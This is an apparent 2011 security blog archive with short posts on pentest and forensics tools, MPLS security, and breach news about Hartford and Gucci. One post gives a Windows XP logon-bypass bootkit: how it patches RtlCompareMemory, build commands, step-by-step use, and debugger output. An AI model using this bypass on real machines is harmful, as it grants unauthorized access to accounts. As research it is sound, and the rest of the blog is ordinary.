Wednesday, April 27, 2011

Call to Web APP Pentesters

OWASP Hackademic Challenges

This is an open source project that helps us test our knowledge on web applications security. This can actually be used to attack web applications in a realistic but controllable safe env.

You can download the current version here. Don't feel like setting up the env. yourself. Try the live hosted version. Kudos to the OWASP team.

Least frequently occuring strings

Dave Hull has this nice blog article describing the use of the concept of "Least Frequency of Occurence" principle that Peter Silberman spoke about at SANS Forensics Summit. Please keep in mind that it is a hypothetical scenario based on an actual case. So there possibly are better ways of "finding the evil", in the hypothetical case, but its meant to show how this concept works.

Read more here.

Tuesday, April 26, 2011

MPLS and security

As part of my work, I'm trying to figure out the security concerns of MPLS and here are my brain droppings on the same.

My networks guys insist that MPLS is private and therefore secure, but is it really. It is true that in general MPLS networks are considered private networks and do not require encryption. But this relies heavily on provider's configuration and implementation of the MPLS networks. If the provider MPLS network provides exposure to the internet either through the LSR or any other device, then it has to be deemed "untrusted".  MPLS relies heavily on label switching and is just another specialized form of IP network. So how "private" the MPLS is completely dependent on how "private" has it been engineered to be. Though private addressing is used on the MPLS network, this is just private to the carrier and may not be private to the customer. And also, solely because private addressing is used, by no means warrants that this traffic does not come into contact with Internet or Internet traffic. It seems to be a fairly common practice to use carrier core routers using VRFs to forward both MPLS and Internet traffic on the same equipment. As a matter of fact, it is a fairly common practice to route ATM and Frame Relay networks over MPLS backbones.

Taking this into consideration, it would be prudent of a security engineer to look into the MPLS configs more closely and work with the carriers, in trying to understand how the carrier implements MPLs, and see if you can peer into their LSR configs. Its only a matter of time, before someone figures out a way to attack MPLS successfully via the public Internet, and then everyone will rush to respond to the situation. Ensuring encryption of your MPLs circuits will go a long way in keeping your company showing up on the front page.

Thursday, April 21, 2011

Growly notes

Have been using a Mac for a while now. Missed Microsoft OneNote that I use extensively on my work machine. Today I came across a gem in Mac called Growly Notes. Growly notes bring a lot of OneNote-like interface and lsot of features to Mac for free. Growly Notes lacks many of the robust features of OneNote, but works good for me. Being an active OneNote user, getting comfortable using Growly did not take a lot. Almost everything works the same way. Interface feels very familiar.

Kudos to Growly bird software guys. Please give a shout out to those guyz.




FileInfo is an opensource GUI forensic tool designed to extract information from files. A text version has been available for a while.

This Beta version allows you to do the following:

- Meta Data Information

- String ASCII and Unicode

- Hash MD5 and SHA1

- Detect and Show PE32 Information

- Detect and Extract Thumbnail from JPEG file

More information can be found here.


Tuesday, April 12, 2011

Splitcap - the PCAP file splitter

SplitCap is an opensource pcap file splitter. It splits one big PCAP file into multiple files based on TCP and UDP sessions, one PCAP file per host-pair instead of a session. TCP and UDP sessions concept in SplitCap is defined as bi-directional flows, ie., all frames / packets with the same 5-touple (source host, destination host, source port, destination port, transport protocol) regardless of packet direction are considered part of the same session.

SplitCap is writtern C# using .NET framework 2.0.

Usage: SplitCap [OPTIONS]…


-r <input_file> : Set the pcap file to read from

-o <output_directory> : Manually specify output directory

-d : Delete previous output data

-p <nr_parallel_sessions> : Set the number of parallel sessions
to keep in memory (default = 10000). More sessions might be needed to
split pcap files from busy links such as an Internet backbone link, this
will however require more memory

-b <file_buffer_bytes> : Set the number of bytes to buffer for
each session/output file (default = 10000). Larger buffers will speed up
the process due to fewer disk write operations, but will occupy more

-s <GROUP> : Split traffic and group packets to pcap files based on <GROUP>. Possible values for <GROUP> are:

flow : Each flow, i.e. unidirectional traffic for a 5-tuple, is grouped

host : Traffic grouped to one file per host. Most packets will end up in two files.

hostpair : Traffic grouped based on host-pairs communicating

nosplit : Do not split traffic. Only create ONE output pcap.

(default) session : Packets for each session (bi-directional flow) are grouped

-ip <IP address to filter on>

-port <port number to filter on>

-y <FILETYPE> : Output file type for extracted data. Possible values for <FILETYPE> are:

L7 : Only store application layer data

(default) pcap : Store complete pcap frames

Example 1: SplitCap -r dumpfile.pcap

Example 2: SplitCap -r dumpfile.pcap -o session_directory

Example 3: SplitCap -r dumpfile.pcap -s hostpair

Example 4: SplitCap -r dumpfile.pcap -s flow -y L7

Example 5: SplitCap -r dumpfile.pcap -ip -port 80 -port 443 -s nosplit

SplitCap is created as part of the Statistical Protocol IDentification research project carried out by Erik Hjelmvik with fundings from .SE (The Swedish Internet Infrastructure Foundation).

SplitCap can since version 1.5 also be used in order to efficiently
filter a large PCAP file based on one or several IP addresses or TCP/UDP
port numbers. Simply use the “-s nosplit” option together with one
or several “-port” or “-ip” switches to specify what traffic to keep
from the large pcap file. SplitCap performs this type of filtering
much faster and with way less memory usage compared to tshark.

More details about SplitCAP here.

Monday, April 11, 2011

Mozilla Firefox Internals & Attack Strategies

This paper aims to detail some of the techniques and methods that exist to subvert a fully patched and functioning browser Firefox. This aims to provide insight to developers and end users on some methodologies which could be used by malicious users. We will understand some of the basic important components that make up the Mozilla platform and various attacks that can be targeted against it.

Firefox is a trusted browsing platform used by millions across the globe. It is a platform that is used by experts and novices. One of the biggest advantages and reason for massive success of Mozilla is an extensible plug-in model which allows the developers add additional features to the Mozilla Firefox environment than what was perceived by the original writers. Our topic of discussion is focused around these extension modules and how a malicious developer can use some of these powerful features to subvert a Firefox and the underlying systems. The Code of extension runs with the same privilege that the browser enjoys.

More Details


Wappalyzer is a Firefox Add-on that reveals the technologies used on websites like, CMS and e-commerce systems, message boards, Javascript frameworks, hosting panels, analytic tools and more. The company behind Wappalyzer, funded by AOE media collects information about web based software to create publicly available statistics, evelaing their growth over time. Most of the data is collected anonymously (according to the company), from this Firefox add-on which has been installed by users.

You can download the Add-On here, or read more about the tool here.

Sniff Network without WinPcap - RawCap

NETRESEC has announced the release of a tool RawCap, which is a free raw sockets sniffer for Windows. What does this mean to incident responders and Pentesters. This means:
  • Can sniff on any interface that has got an IP address, including loopback addresses
  • No external Libraries or DLLs needed
  • No installation required. the executable is self-sufficient and only 17kB.
  • Can sniff most interface types including WiFi and PPP interfaces
  • Minimal memory and CPU load
For now RawCap takes two arguments;
  • First argument is the IP address or interface number to sniff from
  • Second argument is the path/file to write the captured packets to
Piping this output to other filters turns on a endless array of possibilities. You can read more about this tool here.

Friday, April 8, 2011

Hartford Servers Compromised

The Hartford Servers Infected with Password-Stealing Malware

(April 6 & 7, 2011)

The Hartford insurance company has notified approximately 300 employees,

contractors and customers of a security breach in which attackers

managed to install password-stealing malware known as Qakbot on some of

the company's servers.  The attack was discovered in February 2011;

fewer than 19 customers were affected.  The Hartford sent letters to

people who had logged in to an infected server between February 22 and

28, 2011.

The press loves big numbers, so incidents

like the Epsilon compromise get lots of attention. But there are huge

numbers of compromises like this one happening that are much more

targeted and often actually more damaging than many of the large scale

attacks because they go undetected longer. Qakbot had some really

sophisticated variants that actually only forward targeted credentials

out to command and control/drop sites, reducing its "noise" level even


Fired Employee Indicted For Hacking Gucci Network

Authorities on Monday indicted a former IT
employee at Gucci for hacking into the company's computer network,
deleting files and emails, and causing an estimated $200,000 in damage.

"Computer hacking is not a game. It is a serious threat to corporate
security that can have a devastating effect on personal privacy, jobs,
and the ability of a business to function at all," said Manhattan
district attorney Cyrus R. Vance Jr., in a statement. 

How did a former employee gain access to a corporate network and delete
data? Authorities accuse Yin of creating "a VPN token in the name of a
fictional employee," and then, when he was fired, stealing this
USB-based token to gain remote access.

According to authorities, "in the months that followed, using the VPN
token, Yin exploited his familiarity with Gucci's network configuration
and administrator-level passwords to gain nearly unfettered access to
Gucci's network."

Rigorous Internal IT auditing is essential to mitigate the risk of disgruntled employees, and use of orphan/hidden accounts that employees in a position to abuse privileges could create. What did you company internal audit find out !!?? Dormant active accounts are screaming sirens waiting to be noticed. Use technologies like SIEM, to track usage of service accounts, beyond their intended use.

Hartford Servers Compromised

The Hartford Servers Infected with Password-Stealing Malware

(April 6 & 7, 2011)

The Hartford insurance company has notified approximately 300 employees,

contractors and customers of a security breach in which attackers

managed to install password-stealing malware known as Qakbot on some of

the company's servers.  The attack was discovered in February 2011;

fewer than 19 customers were affected.  The Hartford sent letters to

people who had logged in to an infected server between February 22 and

28, 2011.

The press loves big numbers, so incidents

like the Epsilon compromise get lots of attention. But there are huge

numbers of compromises like this one happening that are much more

targeted and often actually more damaging than many of the large scale

attacks because they go undetected longer. Qakbot had some really

sophisticated variants that actually only forward targeted credentials

out to command and control/drop sites, reducing its "noise" level even


Sniffing USB traffic with VMWare

VMWare offers the possibility to dump any usb traffic at the lowest level to a dump file. We'll describe here how to activate this feature, and additionally publish a script to convert the dump file to the PCAP format, suitable for use with wireshark.

Enable USB logging

VMWare can be configured to dump all the low-level USB traffic going to a given virtual machine to a file on the host. This functionality is activated through the addition of a few lines in the .vmx virtual machine control file :

monitor = "debug"
usb.analyzer.enable = TRUE
usb.analyzer.maxLine = 8192
mouse.vusb.enable = FALSE

This will enable the log of the raw usb traffic to the vmware.log file, with the USBIO prefix. The maxline setting enables the full USB packet payload logging. Once you start the virtual machine with these settings, beware that the log file may become very big quickly !

To make sense of the data gathered this way, a very good software is available : vsusb-analyser. You can also refer to the project page for more information on the effects of the VMWare configuration elements. It appears that the VMWare log format is not very compact or interoperable ; so Soget ESEC Lab wrote a script that can convert the USB information back into a PCAP format. This way, you can watch the flow in Wireshark, or many other software. Please note that the PCAP format for USB is not very well documented, so ymmv.

Bypassing XP Logon - without resetting any passwords (read Stealth)

The idea is to use kernel debugger in order to modify routine msv1_0!MsvpPasswordValidate in such a way it always returns TRUE, even for an incorrect password. I was impressed by the simplicity of the idea and decided to implement it using bootable CD instead of debugger. A great compilation of information on bootable CD is eEye's BootRoot [2]. Another inspirational material is [3].

Theory of operation:

Flow of execution
0. hic sum leones (DRAM initialization, POST, etc.) - see [4]
1. boot from CD:
        CD code hooks int 15h and copies itself to RAM
        CD code boots NTLDR from HDD
2. boot from HDD
        NTLDR is running
        NTLDR calls int 15h
        int 15h hooked handler patches NTDLR with 32 bit stager
        NTLDR is running
        32 bit stager is called
        32 bit stager calls payload
        payload hooks IoCreateDriver
        NTLDR is running
        IoCreateDriver is called, hook registers custom callback
            using PsSetLoadImageNotifyRoutine
        PspLoadImageNotifyRoutine notifies us about images being loaded
        if the image name is msv1_0.dll, hook (IAT style) RtlCompareMemory
3.  Windows logon dialog appears and arbitrary password is accepted
        for every account


  1.     int 15h is used instead of usual int 13h used in BootRoot and its clones
  2.     int 15h was found to be viable by using custom interrupt PCI-ROM based sniffer and leads to more compact code
  3.     msv1_0!MsvpPasswordValidate is not hooked, because it's not exported
  4.     password is validated also in ADVAPI32!SystemFunction031
  5.     both functions mentioned above call RtlCompareMemory, which is exported
  6.     RtlCompareMemory is modified in such a way it returns 0 (true) for all the blocks of length of password hash
  7.     it's dirty hack, it's not intended for production use :)

So, how does it work? When you enter password, Windows computes hash of the password and compares it with stored hash of the correct password. But the comparison routine was modified, so it returns true for any two hashes, i.e. for any password you enter.
Using the Code

This tool was designed for CD ISO and Windows XP x86. Feel free to try it with USB flash disk or modify it for new Windows.

    Burn the ISO on CD.
    Boot Windows XP machine from the CD.
    When logon dialog appears, enter required username (e.g. Administrator, SUPPORT_388945a0, etc.) and press enter.
    If everything worked out correctly, you're now logged in.

For building the project from source, you need FASM.exe and Microsoft CDIMAGE.exe.

fasm boot.asm bootkit.rom && cdimage -bbootkit.rom C:\bootkit\root\ C:\bootkit.iso

Assume that C:\bootkit\root is an arbitrary non-empty folder that will be the root of a newly created ISO image which will be written to C:\bootkit.iso.


code project site
Bootkit Source Code


To test the bootkit, you can setup XP in VMWare to boot from C:\bootkit.iso
(don't forget to change boot device in VMWare BIOS to CD). If you want
to see what's going on during the logon process, you can attach windbg.

  1. Grab your free copy of Debugging Tools for Windows from Microsoft and install it.
  2. Edit VMWare machine settings: Add Serial port, 'Output to named
    pipe', 'This end is the server.', 'The other end is application', finish
    and check 'Yield CPU on poll'.
  3. Start XP in VMWare and edit boot.ini using msconfig (add option /DEBUG with COM1 and fastest baudrate). Turn off XP.
  4. Start XP again and run windbg using a shortcut like this one:

    "C:\Program Files\Debugging Tools for Windows 
    (x86)\windbg.exe" -y srv*c:\windows\symbols* -b -k com:pipe,

    If you're successful, you'll see:

    Microsoft (R) Windows Debugger Version 6.9.0003.113 X86
    Copyright (c) Microsoft Corporation. All rights reserved.

    Opened \\.\pipe\com_1
    Waiting to reconnect...
    Connected to Windows XP 2600 x86 compatible target, ptr64 FALSE
    Kernel Debugger connection established. (Initial Breakpoint requested)
    Symbol search path is: srv*c:\windows\symbols*;SRV**
    Executable search path is:
    Windows XP Kernel Version 2600 UP Free x86 compatible
    Built by: 2600.xpsp_sp2_rtm.040803-2158
    Kernel base = 0x804d7000 PsLoadedModuleList = 0x8055ab20
    System Uptime: not available
    Break instruction exception - code 80000003 (first chance)
    * *
    * You are seeing this message because you pressed either *
    * CTRL+C (if you run kd.exe) or, *
    * CTRL+BREAK (if you run WinDBG), *
    * on your debugger machine's keyboard. *
    * *
    * *
    * If you did not intend to break into the debugger, press the "g" key, then *
    * press the "Enter" key now. This message might immediately reappear. If it *
    * does, press "g" and "Enter" again. *
    * *
    804e3b25 cc int 3

  5. Now windbg is attached to windows. Let's see hooked function IoCreateDriver:

    kd> u IoCreateDriver
    805d60e3 b8c3f00980 <span class="code-keyword">mov</span> eax,8009F0C3h <- address of payload.asm/_stager
    805d60e8 ffd0 <span class="code-keyword">call</span> <span class="code-keyword">eax</span> <- <span class="code-keyword">call</span> _stager
    kd> uf 8009F0C3h <- _stager
    8009f0c3 802c2407 <span class="code-keyword">sub</span> <span class="code-keyword">byte</span> <span class="code-keyword">ptr</span> [esp],7
    8009f0c7 <span class="code-digit">60</span> pushad
    8009f0c8 66bb53a3 <span class="code-keyword">mov</span> bx,0A353h
    8009f0cc e80b010000 <span class="code-keyword">call</span> 8009f1dc
    8009f0d1 68ecf00980 <span class="code-keyword">push</span> 8009F0ECh <- address of payload.asm/
    8009f0d6 ffd0 <span class="code-keyword">call</span> <span class="code-keyword">eax</span>
    cleanup hook

    8009F0ECh <- PspLoadImageNotifyRoutine
    - checks if the loaded module is msv1_0.dll
    - if yes, hooks IAT RtlCompareMemory

  6. Module 'msv1_0.dll' is now patched. Enter 'g' and wait till logon screen appears. Then break in (Ctrl+Break).

    kd> !process 0 0 winlogon.exe
    PROCESS 819aaa88 SessionId: 0 Cid: 0274 Peb: 7ffd8000 ParentCid: 01f0
    DirBase: 0a5b2000 ObjectTable: e13d6110 HandleCount: 398.
    Image: winlogon.exe
    kd> .process /p /r 819aaa88
    Implicit process is now 819aaa88
    .cache forcedecodeuser done
    Loading User Symbols

    kd> uf msv1_0!MsvpPasswordValidate <- we want this function to return always TRUE
    77c69927 ?? ???
    ^ Memory access error in
    'u msv1_0!MsvpPasswordValidate l3'
    kd> .pagein msv1_0!MsvpPasswordValidate
    You need to continue execution (press 'g' <enter>) for the pagein to be brought in.
    When the debugger breaks in again, the page will be present.

    kd> g
    Break instruction exception - code 80000003 (first chance)
    804e3b25 cc int 3

    kd> dd msv1_0!_imp__RtlCompareMemory l1 <- this is IAT entry for RtlCompareMemory
    77c610cc 77c60fe5 <- and this is address of our
    new RtlCompareMemory: RtlCompareMemoryPatch

    kd> u 77c60fe5 <- payload.asm/RtlCompareMemoryPatch
    - if size of chunks to compare is 10h (hash size), then return 0 (=TRUE)
    - else call original RtlCompareMemory
    - it's a nasty hack, use different method in production use :)

  7. Now press you can put breakpoint using 'bp msv1_0!MsvpPasswordValidate' (to remove it, type 'bc*') and step through the login process using commands 't' or 'p'. For help, type command '.help command_name'.

Qualys Open Source WAF project "IronBee"

IronBee is a new open source project to build a universal web application security sensor.

Qualys is announcing the development of IronBee, a new open source project to build a universal web application security sensor. Our desire is not only to build the code and the rules, but also to focus on building a community around the project. In fact, we believe that building the community is the most important aspect of the project and the only way to ensure that it has a long life

IronBee has been in development for several months now. Qualys have completed the initial design phase and the prototype implementation, and we have the development and collaboration infrastructure ready. Now that we have a meaningful starting point, Qualys is inviting others to join us. At this time, they are looking for early adopters and those who wish to participate in shaping the project:

  • Developers to work on the IronBee core and on the security modules.
  • Application defenders to tell us what they need and to provide feedback on our proposed solutions (e.g., configuration language, signature language)Application security researchers to exchange attack information, write signatures and rules, and design new detection and protection techniques.
  • Web server and proxy developers to help us make IronBee work in their environments
  • Distribution maintainers to package IronBee to run on their systems
  • Infrastructure and cloud providers to help make IronBee effective for embedding into their infrastructures. 

More Details can be found here.

Tuesday, April 5, 2011

Retina Community Free Vulnerability Assessment Scanner Released « IT Vulnerability & ToolsWatch

Retina Community is a free vulnerability scanner for up to 32 IPs, powered by the renowned Retina Network Security Scanner technology. Retina Community identifies vulnerabilities, configuration issues, and missing patches across operating systems, applications, devices, and virtual environments.

Much more than a stripped down “free trial” product, Retina Community gives you powerful vulnerability assessment across your environment to strengthen security and compliance. The free Retina Community product includes these capabilities:

Vulnerability assessment across operating systems, applications, devices, and virtual environments (32 IPs)
Zero-day vulnerability identification
SCAP configuration scanning
Integrated vulnerability updates and alerting
Detailed vulnerability and executive-level reporting
Report export to XML, CSV, and PDF
Online support and resources from eEye’s research team